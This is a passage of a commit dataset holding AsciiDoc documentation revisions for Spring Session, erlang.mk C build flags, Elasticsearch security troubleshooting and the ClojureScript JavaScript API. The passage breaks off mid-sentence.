http:\/\/gemfire.docs.pivotal.io\/docs-gemfire\/latest\/developing\/query_index\/creating_map_indexes.html[Creating Indexes on Map Fields].\n\nTo learn more about GemFire Indexing in general, see http:\/\/gemfire.docs.pivotal.io\/docs-gemfire\/latest\/developing\/query_index\/query_index.html[Working with Indexes].\n\n\n[[api-mapsessionrepository]]\n=== MapSessionRepository\n\nThe `MapSessionRepository` allows for persisting `ExpiringSession` in a `Map` with the key being the `ExpiringSession` id and the value being the `ExpiringSession`.\nThe implementation can be used with a `ConcurrentHashMap` as a testing or convenience mechanism.\nAlternatively, it can be used with distributed `Map` implementations. For example, it can be used with Hazelcast.\n\n[[api-mapsessionrepository-new]]\n==== Instantiating MapSessionRepository\n\nCreating a new instance is as simple as:\n\n[source,java,indent=0]\n----\ninclude::{indexdoc-tests}[tags=new-mapsessionrepository]\n----\n\n[[api-mapsessionrepository-hazelcast]]\n==== Using Spring Session and Hazlecast\n\nThe <<samples,Hazelcast Sample>> is a complete application demonstrating using Spring Session with Hazelcast.\n\nTo run it use the following:\n\n\t.\/gradlew :samples:hazelcast:tomcatRun\n\nThe <<samples,Hazelcast Spring Sample>> is a complete application demonstrating using Spring Session with Hazelcast and Spring Security.\n\nIt includes example Hazelcast `MapListener` implementations that support firing `SessionCreatedEvent`, `SessionDeletedEvent` and `SessionExpiredEvent`.\n\nTo run it use the following:\n\n\t.\/gradlew :samples:hazelcast-spring:tomcatRun\n\n[[api-mapsessionrepository-hazelcast]]\n==== Using Spring Session and Hazlecast\n\n[[community]]\n== Spring Session Community\n\nWe are glad to consider you a part of our community.\nPlease find additional information below.\n\n[[community-support]]\n=== Support\n\nYou can get help by asking questions on http:\/\/stackoverflow.com\/questions\/tagged\/spring-session[StackOverflow with the tag spring-session].\nSimilarly we encourage helping others by answering questions on StackOverflow.\n\n[[community-source]]\n=== Source Code\n\nOur source code can be found on github at https:\/\/github.com\/spring-projects\/spring-session\/\n\n[[community-issues]]\n=== Issue Tracking\n\nWe track issues in github issues at https:\/\/github.com\/spring-projects\/spring-session\/issues\n\n[[community-contributing]]\n=== Contributing\n\nWe appreciate https:\/\/help.github.com\/articles\/using-pull-requests\/[Pull Requests].\n\n[[community-license]]\n=== License\n\nSpring Session is Open Source software released under the http:\/\/www.apache.org\/licenses\/LICENSE-2.0.html[Apache 2.0 license].\n\n[[minimum-requirements]]\n== Minimum Requirements\n\nThe minimum requirements for Spring Session are:\n\n* Java 5+\n* If you are running in a Servlet Container (not required), Servlet 2.5+\n* If you are using other Spring libraries (not required), the minimum required version is Spring 3.2.14.\nWhile we re-run all unit tests against Spring 3.2.x, we recommend using the latest Spring 4.x version when possible.\n* `@EnableRedisHttpSession` requires Redis 2.8+. This is necessary to support <<api-redisoperationssessionrepository-expiration,Session Expiration>>\n\n[NOTE]\n====\nAt its core Spring Session only has a required dependency on commons-logging.\nFor an example of using Spring Session without any other Spring dependencies, refer to the <<samples,hazelcast sample>> application.\n====\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a751fdc0795b7ddb7d66d0f6a6d4f98e9dbeb04c","subject":"Update 2016-12-12-Heroku-Memo-for-postresql.adoc","message":"Update 2016-12-12-Heroku-Memo-for-postresql.adoc","repos":"javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io,javathought\/javathought.github.io","old_file":"_posts\/2016-12-12-Heroku-Memo-for-postresql.adoc","new_file":"_posts\/2016-12-12-Heroku-Memo-for-postresql.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"mit","lang":"AsciiDoc"} {"commit":"55699eeab57a79fada0bd6dd222cd1218482e0d2","subject":"Add trick for exporting C build flags to sub-Makefiles","message":"Add trick for exporting C build flags to sub-Makefiles\n\nThanks to dozzie on IRC for the suggestion.\n","repos":"jj1bdx\/erlang.mk,rabbitmq\/erlang.mk,ninenines\/erlang.mk,crownedgrouse\/erlang.mk","old_file":"doc\/src\/guide\/ports.asciidoc","new_file":"doc\/src\/guide\/ports.asciidoc","new_contents":"[[ports]]\n== NIFs and port drivers\n\nErlang.mk can not only build Erlang projects, but also the C code\nthat some projects come with, like NIFs and port drivers.\n\nThere are two ways to build the C code: using a custom Makefile,\nor making Erlang.mk do it directly. The C code will be built\nas needed when you run `make`.\n\n\/\/ @todo something for easier bootstrapping\n\n=== C source code location and Erlang environment\n\nThe C source code should be located in the '$(C_SRC_DIR)' directory.\nIt defaults to 'c_src\/'. Should you need to modify it, all you\nneed to do is to set the variable in your Makefile before including\nErlang.mk:\n\n[source,make]\nC_SRC_DIR = $(CURDIR)\/my_nif_source\n\nWhen this directory exists, Erlang.mk will automatically create a\nfile named '$(C_SRC_ENV)'. This file defaults to '$(C_SRC_DIR)\/env.mk'.\nThis can also be changed:\n\n[source,make]\nC_SRC_ENV = $(C_SRC_DIR)\/erlang_env.mk\n\nIt contains a few variable definitions for the environment used for the build:\n\n`ERTS_INCLUDE_DIR`::\n\tPath to the ERTS include files ('erl_driver.h', 'erl_nif.h' and more).\n`ERL_INTERFACE_INCLUDE_DIR`::\n\tPath to the Erl_Interface include files ('ei.h' and related).\n`ERL_INTERFACE_LIB_DIR`::\n\tPath to the Erl_Interface static libraries.\n\n=== Using a custom Makefile\n\nErlang.mk will automatically run `make` if it detects a Makefile\nin '$(C_SRC_DIR)\/Makefile'.\n\nThe Makefile should have at least two targets: a default target\n(which can be anything, for example `all`) which is invoked when\nbuilding the C code, and a `clean` target invoked when cleaning\nit.\n\nYou can include the 'env.mk' file to benefit from the Erlang\nenvironment detection:\n\n[source,make]\ninclude env.mk\n\n=== Using Erlang.mk directly\n\nYou don't need to write a Makefile to build C source code, however.\nErlang.mk comes with rules to build both shared libraries and\nexecutables, using the source files it finds in '$(C_SRC_DIR)'.\n\nBy default, Erlang.mk will create a shared library. To change\nthis and create an executable instead, put this in your Makefile\nbefore including Erlang.mk:\n\n[source,make]\nC_SRC_TYPE = executable\n\nThe generated file name varies depending on the type of project\nyou have (shared library or executable) and on the platform you\nbuild the project on.\n\nFor shared libraries, the generated file name will be\n'$(C_SRC_OUTPUT)$(C_SRC_SHARED_EXTENSION)', with the default\nbeing '$(CURDIR)\/priv\/$(PROJECT)' followed by the extension:\n`.dll` on Windows, `.so` everywhere else.\n\nFor executables, the generated file name is\n'$(C_SRC_OUTPUT)$(C_SRC_EXECUTABLE_EXTENSION)', with the same\ndefault except for the extension: `.exe` on Windows, and otherwise\nnothing.\n\nErlang.mk sets appropriate compile and linker flags by default.\nThese flags vary depending on the platform, and can of course\nbe overriden.\n\n`CC`::\n\tThe compiler to be used.\n`CFLAGS`::\n\tC compiler flags.\n`CXXFLAGS`::\n\tC++ compiler flags.\n`LDFLAGS`::\n\tLinker flags.\n`LDLIBS`::\n\tLibraries to link against.\n\nThe source files are automatically gathered from the contents\nof '$(C_SRC_DIR)'. Erlang.mk looks for '.c', '.C', '.cc' and '.cpp'\nsource files. You can define the variable `SOURCES` to manually\nlist the files to compile.\n\n=== Propagating compile and linker flags to sub-Makefiles\n\nIn some cases it might be necessary to propagate the flags\nyou just defined to the sub-Makefiles of your local project.\nYou generally can't just export those as this could impact\nthe building of dependencies.\n\nMakefiles allow you to export variables for specific targets.\nWhen doing this, the variables will be exported only when\nthis target runs, and not for other targets. It is therefore\npossible to export them when building the C code without\nimpacting other build steps.\n\nBy adding this to your Makefile all five variables will be\nmade available to sub-Makefiles when building C code:\n\n[source,make]\n----\napp-c_src: export CC +=\napp-c_src: export CFLAGS +=\napp-c_src: export CPPFLAGS +=\napp-c_src: export LDFLAGS +=\napp-c_src: export LDLIBS +=\n----\n\nAppending an empty string to the existing value is necessary\nbecause Makefiles expect an assignment for target-specific\nexports. Alternatively you can set a new value:\n\n[source,make]\n----\napp-c_src: export CFLAGS = -O3\n----\n","old_contents":"[[ports]]\n== NIFs and port drivers\n\nErlang.mk can not only build Erlang projects, but also the C code\nthat some projects come with, like NIFs and port drivers.\n\nThere are two ways to build the C code: using a custom Makefile,\nor making Erlang.mk do it directly. The C code will be built\nas needed when you run `make`.\n\n\/\/ @todo something for easier bootstrapping\n\n=== C source code location and Erlang environment\n\nThe C source code should be located in the '$(C_SRC_DIR)' directory.\nIt defaults to 'c_src\/'. Should you need to modify it, all you\nneed to do is to set the variable in your Makefile before including\nErlang.mk:\n\n[source,make]\nC_SRC_DIR = $(CURDIR)\/my_nif_source\n\nWhen this directory exists, Erlang.mk will automatically create a\nfile named '$(C_SRC_ENV)'. This file defaults to '$(C_SRC_DIR)\/env.mk'.\nThis can also be changed:\n\n[source,make]\nC_SRC_ENV = $(C_SRC_DIR)\/erlang_env.mk\n\nIt contains a few variable definitions for the environment used for the build:\n\n`ERTS_INCLUDE_DIR`::\n\tPath to the ERTS include files ('erl_driver.h', 'erl_nif.h' and more).\n`ERL_INTERFACE_INCLUDE_DIR`::\n\tPath to the Erl_Interface include files ('ei.h' and related).\n`ERL_INTERFACE_LIB_DIR`::\n\tPath to the Erl_Interface static libraries.\n\n=== Using a custom Makefile\n\nErlang.mk will automatically run `make` if it detects a Makefile\nin '$(C_SRC_DIR)\/Makefile'.\n\nThe Makefile should have at least two targets: a default target\n(which can be anything, for example `all`) which is invoked when\nbuilding the C code, and a `clean` target invoked when cleaning\nit.\n\nYou can include the 'env.mk' file to benefit from the Erlang\nenvironment detection:\n\n[source,make]\ninclude env.mk\n\n=== Using Erlang.mk directly\n\nYou don't need to write a Makefile to build C source code, however.\nErlang.mk comes with rules to build both shared libraries and\nexecutables, using the source files it finds in '$(C_SRC_DIR)'.\n\nBy default, Erlang.mk will create a shared library. To change\nthis and create an executable instead, put this in your Makefile\nbefore including Erlang.mk:\n\n[source,make]\nC_SRC_TYPE = executable\n\nThe generated file name varies depending on the type of project\nyou have (shared library or executable) and on the platform you\nbuild the project on.\n\nFor shared libraries, the generated file name will be\n'$(C_SRC_OUTPUT)$(C_SRC_SHARED_EXTENSION)', with the default\nbeing '$(CURDIR)\/priv\/$(PROJECT)' followed by the extension:\n`.dll` on Windows, `.so` everywhere else.\n\nFor executables, the generated file name is\n'$(C_SRC_OUTPUT)$(C_SRC_EXECUTABLE_EXTENSION)', with the same\ndefault except for the extension: `.exe` on Windows, and otherwise\nnothing.\n\nErlang.mk sets appropriate compile and linker flags by default.\nThese flags vary depending on the platform, and can of course\nbe overriden.\n\n`CC`::\n\tThe compiler to be used.\n`CFLAGS`::\n\tC compiler flags.\n`CXXFLAGS`::\n\tC++ compiler flags.\n`LDFLAGS`::\n\tLinker flags.\n`LDLIBS`::\n\tLibraries to link against.\n\nThe source files are automatically gathered from the contents\nof '$(C_SRC_DIR)'. Erlang.mk looks for '.c', '.C', '.cc' and '.cpp'\nsource files. You can define the variable `SOURCES` to manually\nlist the files to compile.\n","returncode":0,"stderr":"","license":"isc","lang":"AsciiDoc"} {"commit":"2f9798025ddd34e8aa147699e85a76d87024ddcb","subject":"[DOCS] Reformatted security troubleshooting pages (elastic\/x-pack-elasticsearch#2799)","message":"[DOCS] Reformatted security troubleshooting pages (elastic\/x-pack-elasticsearch#2799)\n\nOriginal commit: elastic\/x-pack-elasticsearch@b10c822ba25bafa20920aa010191b8bc08ecc14b\n","repos":"strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra,vroyer\/elassandra,vroyer\/elassandra,vroyer\/elassandra,strapdata\/elassandra,strapdata\/elassandra","old_file":"docs\/en\/security\/troubleshooting.asciidoc","new_file":"docs\/en\/security\/troubleshooting.asciidoc","new_contents":"[[security-troubleshooting]]\n== {security} Troubleshooting\n\nUse the information in this section to troubleshoot common problems and find\nanswers for frequently asked questions.\n\n* <<security-trb-settings>>\n* <<security-trb-roles>>\n* <<security-trb-extraargs>>\n* <<trouble-shoot-active-directory>>\n* <<trb-security-maccurl>>\n* <<trb-security-sslhandshake>>\n* <<trb-security-ssl>>\n* <<trb-security-internalserver>>\n\n\nTo get help, see <<xpack-help>>.\n\n[[security-trb-settings]]\n=== Some settings are not returned via the nodes settings API\n\n*Symptoms:*\n\n* When you use the {ref}\/cluster-nodes-info.html[nodes info API] to retrieve\nsettings for a node, some information is missing.\n\n*Resolution:*\n\nThis is intentional. Some of the settings are considered to be highly\nsensitive: all `ssl` settings, ldap `bind_dn`, and `bind_password`.\nFor this reason, we filter these settings and do not expose them via\nthe nodes info API rest endpoint. You can also define additional\nsensitive settings that should be hidden using the\n`xpack.security.hide_settings` setting. For example, this snippet\nhides the `url` settings of the `ldap1` realm and all settings of the\n`ad1` realm.\n\n[source, yaml]\n------------------------------------------\nxpack.security.hide_settings: xpack.security.authc.realms.ldap1.url,\nxpack.security.authc.realms.ad1.*\n------------------------------------------\n\n[[security-trb-roles]]\n=== Authorization exceptions\n\n*Symptoms:*\n\n* I configured the appropriate roles and the users, but I still get an\nauthorization exception.\n* I can authenticate to LDAP, but I still get an authorization exception.\n\n\n*Resolution:*\n\n. Verify that the role names associated with the users match the roles defined\nin the `roles.yml` file. You can use the `users` tool to list all the users. Any\nunknown roles are marked with `*`.\n+\n--\n[source, shell]\n------------------------------------------\nbin\/xpack\/users list\nrdeniro : admin\nalpacino : power_user\njacknich : monitoring,unknown_role* <1>\n------------------------------------------\n<1> `unknown_role` was not found in `roles.yml`\n\nFor more information about this command, see\n{ref}\/users-command.html[Users Command].\n--\n\n. If you are authenticating to LDAP, a number of configuration options can cause\nthis error.\n+\n--\n|======================\n|_group identification_ |\n\nGroups are located by either an LDAP search or by the \"memberOf\" attribute on\nthe user. Also, If subtree search is turned off, it will search only one\nlevel deep. See the <<ldap-settings, LDAP Settings>> for all the options.\nThere are many options here and sticking to the defaults will not work for all\nscenarios.\n\n| _group to role mapping_|\n\nEither the `role_mapping.yml` file or the location for this file could be\nmisconfigured. See <<security-files, Security Files>> for more.\n\n|_role definition_|\n\nThe role definition might be missing or invalid.\n\n|======================\n\nTo help track down these possibilities, add the following lines to the end of\nthe `log4j2.properties` configuration file in the `CONFIG_DIR`:\n\n[source,properties]\n----------------\nlogger.authc.name = org.elasticsearch.xpack.security.authc\nlogger.authc.level = DEBUG\n----------------\n\nA successful authentication should produce debug statements that list groups and\nrole mappings.\n--\n\n[[security-trb-extraargs]]\n=== Users command fails due to extra arguments\n\n*Symptoms:*\n\n* The `users` command fails with the following message:\n`ERROR: extra arguments [...] were provided`.\n\n*Resolution:*\n\nThis error occurs when the `users` tool is parsing the input and finds\nunexpected arguments. This can happen when there are special characters used in\nsome of the arguments. For example, on Windows systems the `,` character is\nconsidered a parameter separator; in other words `-r role1,role2` is translated\nto `-r role1 role2` and the `users` tool only recognizes `role1` as an expected\nparameter. The solution here is to quote the parameter: `-r \"role1,role2\"`.\n\nFor more information about this command, see\n{ref}\/users-command.html[Users Command].\n\n[[trouble-shoot-active-directory]]\n=== Users are frequently locked out of Active Directory\n\n*Symptoms:*\n\n* Certain users are being frequently locked out of Active Directory.\n\n*Resolution:*\n\nCheck your realm configuration; realms are checked serially, one after another.\nIf your Active Directory realm is being checked before other realms and there\nare usernames that appear in both Active Directory and another realm, a valid\nlogin for one realm might be causing failed login attempts in another realm.\n\nFor example, if `UserA` exists in both Active Directory and a file realm, and\nthe Active Directory realm is checked first and file is checked second, an\nattempt to authenticate as `UserA` in the file realm would first attempt to\nauthenticate against Active Directory and fail, before successfully\nauthenticating against the `file` realm. Because authentication is verified on\neach request, the Active Directory realm would be checked - and fail - on each\nrequest for `UserA` in the `file` realm. In this case, while the authentication\nrequest completed successfully, the account on Active Directory would have\nreceived several failed login attempts, and that account might become\ntemporarily locked out. Plan the order of your realms accordingly.\n\nAlso note that it is not typically necessary to define multiple Active Directory\nrealms to handle domain controller failures. When using Microsoft DNS, the DNS\nentry for the domain should always point to an available domain controller.\n\n\n[[trb-security-maccurl]]\n=== Certificate verification fails for curl on Mac\n\n*Symptoms:*\n\n* `curl` on the Mac returns a certificate verification error even when the\n`--cacert` option is used.\n\n\n*Resolution:*\n\nApple's integration of `curl` with their keychain technology disables the\n`--cacert` option.\nSee http:\/\/curl.haxx.se\/mail\/archive-2013-10\/0036.html for more information.\n\nYou can use another tool, such as `wget`, to test certificates. Alternately, you\ncan add the certificate for the signing certificate authority MacOS system\nkeychain, using a procedure similar to the one detailed at the\nhttp:\/\/support.apple.com\/kb\/PH14003[Apple knowledge base]. Be sure to add the\nsigning CA's certificate and not the server's certificate.\n\n\n[[trb-security-sslhandshake]]\n=== SSLHandshakeException causes connections to fail\n\n*Symptoms:*\n\n* A `SSLHandshakeException` causes a connection to a node to fail and indicates\nthat there is a configuration issue. Some of the common exceptions are shown\nbelow with tips on how to resolve these issues.\n\n\n*Resolution:*\n\n`java.security.cert.CertificateException: No name matching node01.example.com found`::\n+\n--\nIndicates that a client connection was made to `node01.example.com` but the\ncertificate returned did not contain the name `node01.example.com`. In most\ncases, the issue can be resolved by ensuring the name is specified during\ncertificate creation. For more information, see <<ssl-tls>>. Another scenario is\nwhen the environment does not wish to use DNS names in certificates at all. In\nthis scenario, all settings in `elasticsearch.yml` should only use IP addresses\nincluding the `network.publish_host` setting.\n--\n\n`java.security.cert.CertificateException: No subject alternative names present`::\n+\n--\nIndicates that a client connection was made to an IP address but the returned\ncertificate did not contain any `SubjectAlternativeName` entries. IP addresses\nare only used for hostname verification if they are specified as a\n`SubjectAlternativeName` during certificate creation. If the intent was to use\nIP addresses for hostname verification, then the certificate will need to be\nregenerated with the appropriate IP address. See <<ssl-tls>>.\n--\n\n`javax.net.ssl.SSLHandshakeException: null cert chain` and `javax.net.ssl.SSLException: Received fatal alert: bad_certificate`::\n+\n--\nThe `SSLHandshakeException` indicates that a self-signed certificate was\nreturned by the client that is not trusted as it cannot be found in the\n`truststore` or `keystore`. This `SSLException` is seen on the client side of\nthe connection.\n--\n\n`sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target` and `javax.net.ssl.SSLException: Received fatal alert: certificate_unknown`::\n+\n--\nThis `SunCertPathBuilderException` indicates that a certificate was returned\nduring the handshake that is not trusted. This message is seen on the client\nside of the connection. The `SSLException` is seen on the server side of the\nconnection. The CA certificate that signed the returned certificate was not\nfound in the `keystore` or `truststore` and needs to be added to trust this\ncertificate.\n--\n\n[[trb-security-ssl]]\n=== Common SSL\/TLS exceptions\n\n*Symptoms:*\n\n* You might see some exceptions related to SSL\/TLS in your logs. Some of the\ncommon exceptions are shown below with tips on how to resolve these issues. +\n\n\n\n*Resolution:*\n\n`WARN: received plaintext http traffic on a https channel, closing connection`::\n+\n--\nIndicates that there was an incoming plaintext http request. This typically\noccurs when an external applications attempts to make an unencrypted call to the\nREST interface. Please ensure that all applications are using `https` when\ncalling the REST interface with SSL enabled.\n--\n\n`org.elasticsearch.common.netty.handler.ssl.NotSslRecordException: not an SSL\/TLS record:`::\n+\n--\nIndicates that there was incoming plaintext traffic on an SSL connection. This\ntypically occurs when a node is not configured to use encrypted communication\nand tries to connect to nodes that are using encrypted communication. Please\nverify that all nodes are using the same setting for\n`xpack.security.transport.ssl.enabled`.\n\nFor more information about this setting, see\n{ref}\/security-settings.html[Security Settings in {es}].\n--\n\n`java.io.StreamCorruptedException: invalid internal transport message format, got`::\n+\n--\nIndicates an issue with data received on the transport interface in an unknown\nformat. This can happen when a node with encrypted communication enabled\nconnects to a node that has encrypted communication disabled. Please verify that\nall nodes are using the same setting for `xpack.security.transport.ssl.enabled`.\n\nFor more information about this setting, see\n{ref}\/security-settings.html[Security Settings in {es}].\n--\n\n`java.lang.IllegalArgumentException: empty text`::\n+\n--\nThis exception is typically seen when a `https` request is made to a node that\nis not using `https`. If `https` is desired, please ensure the following setting\nis in `elasticsearch.yml`:\n\n[source,yaml]\n----------------\nxpack.security.http.ssl.enabled: true\n----------------\n\nFor more information about this setting, see\n{ref}\/security-settings.html[Security Settings in {es}].\n--\n\n`ERROR: unsupported ciphers [...] were requested but cannot be used in this JVM`::\n+\n--\nThis error occurs when a SSL\/TLS cipher suite is specified that cannot supported\nby the JVM that {es} is running in. Security tries to use the specified cipher\nsuites that are supported by this JVM. This error can occur when using the\nSecurity defaults as some distributions of OpenJDK do not enable the PKCS11\nprovider by default. In this case, we recommend consulting your JVM\ndocumentation for details on how to enable the PKCS11 provider.\n\nAnother common source of this error is requesting cipher suites that use\nencrypting with a key length greater than 128 bits when running on an Oracle JDK.\nIn this case, you must install the\n<<ciphers, JCE Unlimited Strength Jurisdiction Policy Files>>.\n--\n\n[[trb-security-internalserver]]\n=== Internal Server Error in Kibana\n\n*Symptoms:*\n\n* In 5.1.1, an `UnhandledPromiseRejectionWarning` occurs and {kib} displays an\nInternal Server Error.\n\/\/TBD: Is the same true for later releases?\n\n*Resolution:*\n\nIf the Security plugin is enabled in {es} but disabled in {kib}, you must\nstill set `elasticsearch.username` and `elasticsearch.password` in `kibana.yml`.\nOtherwise, {kib} cannot connect to {es}.\n","old_contents":"[[security-troubleshooting]]\n== {security} Troubleshooting\n\n[float]\n=== `settings`\n\nSome settings are not returned via the nodes settings API::\n+\n--\nThis is intentional. Some of the settings are considered to be highly\nsensitive: all `ssl` settings, ldap `bind_dn`, `bind_password`).\nFor this reason, we filter these settings and do not expose them via\nthe nodes info API rest endpoint. You can also define additional\nsensitive settings that should be hidden using the\n`xpack.security.hide_settings` setting. For example, this snippet\nhides the `url` settings of the `ldap1` realm and all settings of the\n`ad1` realm.\n\n[source, yaml]\n------------------------------------------\nxpack.security.hide_settings: xpack.security.authc.realms.ldap1.url, xpack.security.authc.realms.ad1.*\n------------------------------------------\n\n--\n\n[float]\n=== `users`\n\nI configured the appropriate roles and the users, but I still get an authorization exception::\n+\n--\nVerify that the role names associated with the users match the roles defined in the `roles.yml` file. You\ncan use the `users` tool to list all the users. Any unknown roles are marked with `*`.\n\n[source, shell]\n------------------------------------------\nbin\/xpack\/users list\nrdeniro : admin\nalpacino : power_user\njacknich : monitoring,unknown_role* <1>\n------------------------------------------\n<1> `unknown_role` was not found in `roles.yml`\n--\n\nERROR: extra arguments [...] were provided::\n+\n--\nThis error occurs when the `users` tool is parsing the input and finds unexepected arguments. This can happen when there\nare special characters used in some of the arguments. For example, on Windows systems the `,` character is considered\na parameter separator; in other words `-r role1,role2` is translated to `-r role1 role2` and the `users` tool only recognizes\n`role1` as an expected parameter. The solution here is to quote the parameter: `-r \"role1,role2\"`.\n--\n\n[[trouble-shoot-active-directory]]\n[float]\n=== Active Directory\n\nCertain users are being frequently locked out of Active Directory::\n+\n--\nCheck your realm configuration; realms are checked serially, one after another. If your Active Directory realm is being checked before other realms and there are usernames\nthat appear in both Active Directory and another realm, a valid login for one realm may be causing failed login attempts in another realm.\n\nFor example, if `UserA` exists in both Active Directory and a file realm, and the Active Directory realm is checked first and\nfile is checked second, an attempt to authenticate as `UserA` in the file realm would first attempt to authenticate\nagainst Active Directory and fail, before successfully authenticating against the `file` realm. Because authentication is\nverified on each request, the Active Directory realm would be checked - and fail - on each request for `UserA` in the `file`\nrealm. In this case, while the authentication request completed successfully, the account on Active Directory would have received\nseveral failed login attempts, and that account may become temporarily locked out. Plan the order of your realms accordingly.\n\nAlso note that it is not typically necessary to define multiple Active Directory realms to handle domain controller failures. When using Microsoft DNS, the DNS entry for the domain should always point to an available domain controller.\n--\n\n[float]\n=== LDAP\n\nI can authenticate to LDAP, but I still get an authorization exception::\n+\n--\nA number of configuration options can cause this error.\n\n|======================\n|_group identification_ |\n\nGroups are located by either an LDAP search or by the \"memberOf\" attribute on\nthe user. Also, If subtree search is turned off, it will search only one\nlevel deep. See the <<ldap-settings, LDAP Settings>> for all the options.\nThere are many options here and sticking to the defaults will not work for all\nscenarios.\n\n| _group to role mapping_|\n\nEither the `role_mapping.yml` file or the location for this file could be\nmisconfigured. See <<security-files, Security Files>> for more.\n\n|_role definition_|\n\nThe role definition may be missing or invalid.\n\n|======================\n\nTo help track down these possibilities, add the following lines to the end of the `log4j2.properties` configuration file in the\n`CONFIG_DIR`:\n\n[source,properties]\n----------------\nlogger.authc.name = org.elasticsearch.xpack.security.authc\nlogger.authc.level = DEBUG\n----------------\n\nA successful authentication should produce debug statements that list groups and role mappings.\n--\n\n\n[float]\n=== Encryption & Certificates\n\n`curl` on the Mac returns a certificate verification error even when the `--cacert` option is used::\n+\n--\nApple's integration of `curl` with their keychain technology disables the `--cacert` option.\nSee http:\/\/curl.haxx.se\/mail\/archive-2013-10\/0036.html for more information.\n\nYou can use another tool, such as `wget`, to test certificates. Alternately, you can add the certificate for the\nsigning certificate authority MacOS system keychain, using a procedure similar to the one detailed at the\nhttp:\/\/support.apple.com\/kb\/PH14003[Apple knowledge base]. Be sure to add the signing CA's certificate and not the server's certificate.\n--\n\n[float]\n==== SSLHandshakeException causing connections to fail\n\nA `SSLHandshakeException` will cause a connection to a node to fail and indicates that there is a configuration issue. Some of the\ncommon exceptions are shown below with tips on how to resolve these issues.\n\n`java.security.cert.CertificateException: No name matching node01.example.com found`::\n+\n--\nIndicates that a client connection was made to `node01.example.com` but the certificate returned did not contain the name `node01.example.com`.\nIn most cases, the issue can be resolved by ensuring the name is specified during certificate creation. For more information, see <<ssl-tls>>.\nAnother scenario is when the environment does not wish to use DNS names in certificates at all. In this scenario, all settings\nin `elasticsearch.yml` should only use IP addresses including the `network.publish_host` setting.\n--\n\n`java.security.cert.CertificateException: No subject alternative names present`::\n+\n--\nIndicates that a client connection was made to an IP address but the returned certificate did not contain any `SubjectAlternativeName` entries.\nIP addresses are only used for hostname verification if they are specified as a `SubjectAlternativeName` during certificate creation. If the intent was to use IP addresses for hostname verification, then the certificate\nwill need to be regenerated with the appropriate IP address. See <<ssl-tls>>.\n--\n\n`javax.net.ssl.SSLHandshakeException: null cert chain` and `javax.net.ssl.SSLException: Received fatal alert: bad_certificate`::\n+\n--\nThe `SSLHandshakeException` above indicates that a self-signed certificate was returned by the client that is not trusted\nas it cannot be found in the `truststore` or `keystore`. The `SSLException` above is seen on the client side of the connection.\n--\n\n`sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target` and `javax.net.ssl.SSLException: Received fatal alert: certificate_unknown`::\n+\n--\nThe `SunCertPathBuilderException` above indicates that a certificate was returned during the handshake that is not trusted.\nThis message is seen on the client side of the connection. The `SSLException` above is seen on the server side of the\nconnection. The CA certificate that signed the returned certificate was not found in the `keystore` or `truststore` and\nneeds to be added to trust this certificate.\n--\n\n[float]\n==== Other SSL\/TLS related exceptions\n\nThe are other exceptions related to SSL that may be seen in the logs. Below you will find some common exceptions and their\nmeaning.\n\nWARN: received plaintext http traffic on a https channel, closing connection::\n+\n--\nIndicates that there was an incoming plaintext http request. This typically occurs when an external applications attempts\nto make an unencrypted call to the REST interface. Please ensure that all applications are using `https` when calling the\nREST interface with SSL enabled.\n--\n\n`org.elasticsearch.common.netty.handler.ssl.NotSslRecordException: not an SSL\/TLS record:`::\n+\n--\nIndicates that there was incoming plaintext traffic on an SSL connection. This typically occurs when a node is not\nconfigured to use encrypted communication and tries to connect to nodes that are using encrypted communication. Please\nverify that all nodes are using the same setting for `xpack.security.transport.ssl.enabled`.\n--\n\n`java.io.StreamCorruptedException: invalid internal transport message format, got`::\n+\n--\nIndicates an issue with data received on the transport interface in an unknown format. This can happen when a node with\nencrypted communication enabled connects to a node that has encrypted communication disabled. Please verify that all\nnodes are using the same setting for `xpack.security.transport.ssl.enabled`.\n--\n\n`java.lang.IllegalArgumentException: empty text`::\n+\n--\nThe exception is typically seen when a `https` request is made to a node that is not using `https`. If `https` is desired,\nplease ensure the following setting is in `elasticsearch.yml`:\n\n[source,yaml]\n----------------\nxpack.security.http.ssl.enabled: true\n----------------\n--\n\nERROR: unsupported ciphers [...] were requested but cannot be used in this JVM::\n+\n--\nThis error occurs when a SSL\/TLS cipher suite is specified that cannot supported by the JVM that Elasticsearch is running\nin. Security will try to use the specified cipher suites that are supported by this JVM. This error can occur when using\nthe Security defaults as some distributions of OpenJDK do not enable the PKCS11 provider by default. In this case, we\nrecommend consulting your JVM documentation for details on how to enable the PKCS11 provider.\n\nAnother common source of this error is requesting cipher suites that use encrypting with a key length greater than 128 bits\nwhen running on an Oracle JDK. In this case, you will need to install the <<ciphers, JCE Unlimited Strength Jurisdiction Policy Files>>.\n--\n\n[float]\n==== Internal Server Error in Kibana\n\nIf the Security plugin is enabled in Elasticsearch but disabled in Kibana, you must\nstill set `elasticsearch.username` and `elasticsearch.password` in `kibana.yml`.\nOtherwise, Kibana cannot connect to Elasticsearch. In 5.1.1, this results in an\n`UnhandledPromiseRejectionWarning` and Kibana displays an Internal Server Error.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a8dd8e5281fbd05d2624f36aa8128ad1f44fc8c4","subject":"Minor tweak to JavaScript API introduction","message":"Minor tweak to JavaScript API introduction\n\nI found it confusing that this described the \"JavaScript API\" and then all the examples were in ClojureScript. I also found referring to \"ClojureScript types\" a little confusing. Hopefully this conveys the intent.","repos":"clojure\/clojurescript-site","old_file":"content\/reference\/javascript-api.adoc","new_file":"content\/reference\/javascript-api.adoc","new_contents":"= JavaScript API\nMike Fikes\n2017-12-06\n:type: reference\n:toc: macro\n:icons: font\n\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\ntoc::[]\n\nThe implementation of ClojureScript collections define several JavaScript functions\nthat can be called from ClojureScript using JavaScript interop or directly from\nJavaScript. This page describes those functions which are officially stable and \npublicly-consumable.\n\n[[indexOf]]\n=== indexOf\n\n==== Syntax\n\n[source,clojure]\n----\n(.indexOf coll search-value)\n(.indexOf coll search-value from-index)\n----\n\n==== Parameters\n\n`coll` - a collection satisfying the `sequential?` predicate.\n\n`search-value` - the value to search for.\n\n`from-index` - an optional starting index.\n\n==== Description\n\nGets the index of a value in a sequential collection, or `-1` if\nnot found. By default, search proceeds from the 